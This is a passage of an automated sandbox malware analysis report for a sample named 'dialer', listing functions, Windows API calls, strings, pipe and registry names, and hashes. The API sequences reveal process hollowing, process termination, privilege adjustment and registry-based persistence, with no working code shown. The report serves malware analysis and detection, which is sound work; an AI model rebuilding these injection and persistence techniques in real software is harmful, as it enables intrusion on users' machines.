HeapAlloc.KERNEL32 ref: 00007FF68D3D153D
K32EnumProcesses.KERNEL32 ref: 00007FF68D3D1557
OpenProcess.KERNEL32 ref: 00007FF68D3D1585
K32EnumProcessModules.KERNEL32 ref: 00007FF68D3D15AA
ReadProcessMemory.KERNELBASE ref: 00007FF68D3D15E1
CloseHandle.KERNELBASE ref: 00007FF68D3D161D
GetProcessHeap.KERNEL32 ref: 00007FF68D3D162F
HeapFree.KERNEL32 ref: 00007FF68D3D163D
GetProcessHeap.KERNEL32 ref: 00007FF68D3D1643
HeapFree.KERNEL32 ref: 00007FF68D3D1651

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction ID: 3342f0b7c01278d299382eba71afc5471610c449841624e860445afbed033a4c
Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction Fuzzy Hash: 19519E32B15682CBFB619F62A8546A9A3A1FF4AB84F444038DE4DC7758EF3CD549CA10

Function 00007FF68D3D1B54 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF68D3D1BA3
SetEntriesInAclW.ADVAPI32 ref: 00007FF68D3D1BEB
LocalAlloc.KERNEL32 ref: 00007FF68D3D1BFB
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF68D3D1C0F
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF68D3D1C26
CreateNamedPipeW.KERNELBASE ref: 00007FF68D3D1C67

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction ID: 51b439a764ac23896e26a5a02ce31449a29bfeea5244df1c484b0e0030158c6c
Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction Fuzzy Hash: 49317172614651CBE720CF24E48079EB7A5FB49798F40422AEB4D87E98EF38D108CF50

Function 00007FF68D3D2B38 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF68D3D2B53
HeapAlloc.KERNEL32 ref: 00007FF68D3D2B67
GetProcessHeap.KERNEL32 ref: 00007FF68D3D2B70
HeapAlloc.KERNEL32 ref: 00007FF68D3D2B7E
K32EnumProcesses.KERNEL32 ref: 00007FF68D3D2B99
Sleep.KERNEL32 ref: 00007FF68D3D2BEE

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction ID: 22bd6dcec7909e6d6ecbeb0e0a9d70ae4d9a50126778e9495d5d4393abc7a756
Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction Fuzzy Hash: 22116F36A08653CBE718DF16A85442EB661FF86B80F14403CDA4A97758DE7DE849CF60

Function 00007FF68D3D1F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF68D3D1F5D
StrCatW.SHLWAPI ref: 00007FF68D3D1F6B
GetModuleHandleW.KERNEL32 ref: 00007FF68D3D1F74
GetCurrentProcess.KERNEL32 ref: 00007FF68D3D1F94
K32GetModuleInformation.KERNEL32 ref: 00007FF68D3D1FA8
CreateFileW.KERNELBASE ref: 00007FF68D3D1FD8
CreateFileMappingW.KERNELBASE ref: 00007FF68D3D2002
MapViewOfFile.KERNELBASE ref: 00007FF68D3D2025
lstrcmpiA.KERNEL32 ref: 00007FF68D3D207B
VirtualProtect.KERNELBASE ref: 00007FF68D3D20AE
VirtualProtect.KERNELBASE ref: 00007FF68D3D20DE
CloseHandle.KERNELBASE ref: 00007FF68D3D20E7
CloseHandle.KERNEL32 ref: 00007FF68D3D20F0
FreeLibrary.KERNEL32 ref: 00007FF68D3D20F9

Strings

C:\Windows\System32\, xrefs: 00007FF68D3D1F4F
.text, xrefs: 00007FF68D3D2074

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction ID: b1aad000824aaf5dd49b90e7f9b27ddb2b2cadee0a52165e92be6697c0fb9a99
Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction Fuzzy Hash: AB519226A08682D7EB119F16E45476AB361FF86B94F444139DE4E83B58EF3CE94CCB10

Function 00007FF68D3D2BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D3D1B54: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF68D3D1BA3
Part of subcall function 00007FF68D3D1B54: SetEntriesInAclW.ADVAPI32 ref: 00007FF68D3D1BEB
Part of subcall function 00007FF68D3D1B54: LocalAlloc.KERNEL32 ref: 00007FF68D3D1BFB
Part of subcall function 00007FF68D3D1B54: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF68D3D1C0F
Part of subcall function 00007FF68D3D1B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF68D3D1C26
Part of subcall function 00007FF68D3D1B54: CreateNamedPipeW.KERNELBASE ref: 00007FF68D3D1C67

Sleep.KERNEL32 ref: 00007FF68D3D2C1D
ConnectNamedPipe.KERNELBASE ref: 00007FF68D3D2C2A
ReadFile.KERNEL32 ref: 00007FF68D3D2C4D
WriteFile.KERNEL32 ref: 00007FF68D3D2C7B
Sleep.KERNEL32 ref: 00007FF68D3D2C88
DisconnectNamedPipe.KERNEL32 ref: 00007FF68D3D2C91

Strings

\\.\pipe\dialerchildproc64, xrefs: 00007FF68D3D2C05
M, xrefs: 00007FF68D3D2C6E

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
Instruction ID: 70c36bce4784513eabde3c06528372354b36649fdf0439df4b2cb0fddd0ed4b6
Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
Instruction Fuzzy Hash: 6A111F25A58646D3F614DB21E8043B9E760BF867A0F044239D96AC36D4EF7CE94CCB20

Function 00007FF68D3D21D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D3D1B54: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF68D3D1BA3
Part of subcall function 00007FF68D3D1B54: SetEntriesInAclW.ADVAPI32 ref: 00007FF68D3D1BEB
Part of subcall function 00007FF68D3D1B54: LocalAlloc.KERNEL32 ref: 00007FF68D3D1BFB
Part of subcall function 00007FF68D3D1B54: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF68D3D1C0F
Part of subcall function 00007FF68D3D1B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF68D3D1C26
Part of subcall function 00007FF68D3D1B54: CreateNamedPipeW.KERNELBASE ref: 00007FF68D3D1C67

Sleep.KERNEL32 ref: 00007FF68D3D21F5
ConnectNamedPipe.KERNELBASE ref: 00007FF68D3D2202
ReadFile.KERNEL32 ref: 00007FF68D3D2225
Sleep.KERNEL32 ref: 00007FF68D3D2246
DisconnectNamedPipe.KERNEL32 ref: 00007FF68D3D224F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF68D3D21DD

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
Instruction ID: 8362e39e7d25f46ce84185a2f8b954e5779d490f8de904119c318f230955b80f
Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
Instruction Fuzzy Hash: 20010025A48542D3F6549B21E844279E360BF57BE0F54423CDA6AC26E4EF7CE84CCB20

Function 00007FF68D3D17EC Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,00000000,?,00007FF68D3D238B,?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D1801
HeapAlloc.KERNEL32(?,00000000,?,00007FF68D3D238B,?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D1812

Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D150B
Part of subcall function 00007FF68D3D14D8: HeapAlloc.KERNEL32 ref: 00007FF68D3D151E
Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D152C
Part of subcall function 00007FF68D3D14D8: HeapAlloc.KERNEL32 ref: 00007FF68D3D153D
Part of subcall function 00007FF68D3D14D8: K32EnumProcesses.KERNEL32 ref: 00007FF68D3D1557
Part of subcall function 00007FF68D3D14D8: OpenProcess.KERNEL32 ref: 00007FF68D3D1585
Part of subcall function 00007FF68D3D14D8: K32EnumProcessModules.KERNEL32 ref: 00007FF68D3D15AA
Part of subcall function 00007FF68D3D14D8: ReadProcessMemory.KERNELBASE ref: 00007FF68D3D15E1
Part of subcall function 00007FF68D3D14D8: CloseHandle.KERNELBASE ref: 00007FF68D3D161D
Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D162F
Part of subcall function 00007FF68D3D14D8: HeapFree.KERNEL32 ref: 00007FF68D3D163D
Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D1643
Part of subcall function 00007FF68D3D14D8: HeapFree.KERNEL32 ref: 00007FF68D3D1651

OpenProcess.KERNEL32 ref: 00007FF68D3D1859
TerminateProcess.KERNEL32 ref: 00007FF68D3D186C
CloseHandle.KERNEL32 ref: 00007FF68D3D1875
GetProcessHeap.KERNEL32 ref: 00007FF68D3D1885

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction ID: 6aa203e5a905bfb3da0ee92d99c4b9561fb988c31448927f9520bb5083f331f1
Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction Fuzzy Hash: B8113022F09643C7FB15DB26A844069A7A1BF8BB84B18403CDA0DC3755EE3CD849CB10

Function 00007FF68D3D18AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18CA
IsWow64Process.KERNEL32(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18E0
CloseHandle.KERNELBASE(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18FB

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction ID: 0dd8c0ba2115ebc41de1b510431011f99bb72194d0ea0b7162bd496fb6fe1d45
Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction Fuzzy Hash: 53F01D21B0978293EB559F16A584129A661FF8ABC0F54903DEA8DC3758EF3DD889CB10

Function 00007FF68D3D2258 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D3D226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D228F
Part of subcall function 00007FF68D3D226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D229F
Part of subcall function 00007FF68D3D226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D22B9
Part of subcall function 00007FF68D3D226C: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF68D3D22D0
Part of subcall function 00007FF68D3D226C: AdjustTokenPrivileges.KERNELBASE ref: 00007FF68D3D2308
Part of subcall function 00007FF68D3D226C: GetLastError.KERNEL32 ref: 00007FF68D3D2312
Part of subcall function 00007FF68D3D226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D231B
Part of subcall function 00007FF68D3D226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D232F
Part of subcall function 00007FF68D3D226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D2346
Part of subcall function 00007FF68D3D226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D235F
Part of subcall function 00007FF68D3D226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D2371
Part of subcall function 00007FF68D3D226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D237E
Part of subcall function 00007FF68D3D226C: RegCreateKeyExW.KERNELBASE ref: 00007FF68D3D23BE
Part of subcall function 00007FF68D3D226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF68D3D23E5
Part of subcall function 00007FF68D3D226C: RegSetKeySecurity.KERNELBASE ref: 00007FF68D3D23FE
Part of subcall function 00007FF68D3D226C: LocalFree.KERNEL32 ref: 00007FF68D3D2408

ExitProcess.KERNEL32 ref: 00007FF68D3D2263

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
String ID:
API String ID: 3836936051-0
Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction ID: 694a3a89772a88086bb854457f8485e67a0d695976de4f583de969f620a5c7d4
Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction Fuzzy Hash: F2A00115E5A543C7FA4837B5985A06CA1617F96A42F900438E00AD6296ED2C685ACA35

Non-executed Functions

Function 00007FF68D3D2560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF68D3D25E7

Part of subcall function 00007FF68D3D18AC: OpenProcess.KERNEL32(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18CA
Part of subcall function 00007FF68D3D18AC: IsWow64Process.KERNEL32(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18E0
Part of subcall function 00007FF68D3D18AC: CloseHandle.KERNELBASE(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18FB

Part of subcall function 00007FF68D3D10C0: OpenProcess.KERNEL32 ref: 00007FF68D3D112C
Part of subcall function 00007FF68D3D10C0: OpenProcess.KERNEL32 ref: 00007FF68D3D114B
Part of subcall function 00007FF68D3D10C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF68D3D1170
Part of subcall function 00007FF68D3D10C0: PathFindFileNameW.SHLWAPI ref: 00007FF68D3D117E
Part of subcall function 00007FF68D3D10C0: lstrlenW.KERNEL32 ref: 00007FF68D3D118A
Part of subcall function 00007FF68D3D10C0: StrCpyW.SHLWAPI ref: 00007FF68D3D11A1
Part of subcall function 00007FF68D3D10C0: CloseHandle.KERNEL32 ref: 00007FF68D3D11AD
Part of subcall function 00007FF68D3D10C0: StrCmpIW.SHLWAPI ref: 00007FF68D3D11E2
Part of subcall function 00007FF68D3D10C0: NtQueryInformationProcess.NTDLL ref: 00007FF68D3D1216
Part of subcall function 00007FF68D3D10C0: OpenProcessToken.ADVAPI32 ref: 00007FF68D3D1240

RegOpenKeyExW.ADVAPI32 ref: 00007FF68D3D2683
RegDeleteValueW.ADVAPI32 ref: 00007FF68D3D269B
ExitProcess.KERNEL32 ref: 00007FF68D3D26BF
GetProcessHeap.KERNEL32 ref: 00007FF68D3D26C6
HeapAlloc.KERNEL32 ref: 00007FF68D3D26D9
K32EnumProcesses.KERNEL32 ref: 00007FF68D3D26F6
ExitProcess.KERNEL32 ref: 00007FF68D3D2796

Strings

dialerstager, xrefs: 00007FF68D3D2694
SOFTWARE, xrefs: 00007FF68D3D2675
open, xrefs: 00007FF68D3D2960

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction ID: 2be691aec108783c2fe5dabd0e32732c6119e52f4228ab01b627362ea6b00014
Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction Fuzzy Hash: 9ED19425A48683DBE7799F2598002B9A365FF46784F400139D94ED7699EE3CEA0CCB60

Function 00007FF68D3D1C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF68D3D1D1D
VirtualAllocEx.KERNEL32 ref: 00007FF68D3D1D4C
WriteProcessMemory.KERNEL32 ref: 00007FF68D3D1D73
WriteProcessMemory.KERNEL32 ref: 00007FF68D3D1DB2
VirtualAlloc.KERNEL32 ref: 00007FF68D3D1DE3
GetThreadContext.KERNEL32 ref: 00007FF68D3D1DFF
WriteProcessMemory.KERNEL32 ref: 00007FF68D3D1E26
SetThreadContext.KERNEL32 ref: 00007FF68D3D1E44
ResumeThread.KERNEL32 ref: 00007FF68D3D1E52
OpenProcess.KERNEL32 ref: 00007FF68D3D1E6A
TerminateProcess.KERNEL32 ref: 00007FF68D3D1E7D

Strings

@, xrefs: 00007FF68D3D1D44

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction ID: 6c926fccff7bb55736e55ddd7b36ea6b261fd78a0b62a41cdb0396561d682473
Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction Fuzzy Hash: CC518E32B04A41CBE7518B22E84066EB7A1FF4AB88F054139DE4DD3758EF38D849CB50

Function 00007FF68D3D19C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00007FF68D3D19E6
SysAllocString.OLEAUT32 ref: 00007FF68D3D19F6
CoInitializeEx.OLE32 ref: 00007FF68D3D1A03
CoInitializeSecurity.OLE32 ref: 00007FF68D3D1A3A
CoCreateInstance.OLE32 ref: 00007FF68D3D1A7A
VariantInit.OLEAUT32 ref: 00007FF68D3D1A8C
CoUninitialize.OLE32 ref: 00007FF68D3D1B26
SysFreeString.OLEAUT32 ref: 00007FF68D3D1B2F
SysFreeString.OLEAUT32 ref: 00007FF68D3D1B38

Strings

dialersvc64, xrefs: 00007FF68D3D19DD

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction ID: 70f641ffef37103d224b8fba2758a0f682d29706ecb33dce003b548a188f7874
Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction Fuzzy Hash: 52414032B04A42D7E710CF65E4442ADB3B5FF89B89F045139EE4D86A58EF38E549C710

Function 00007FF68D3D1000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF68D3D1034
RegDeleteKeyW.ADVAPI32 ref: 00007FF68D3D1045
RegEnumKeyExW.ADVAPI32 ref: 00007FF68D3D1082
RegCloseKey.ADVAPI32 ref: 00007FF68D3D1093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF68D3D10B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF68D3D1026, 00007FF68D3D109C

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

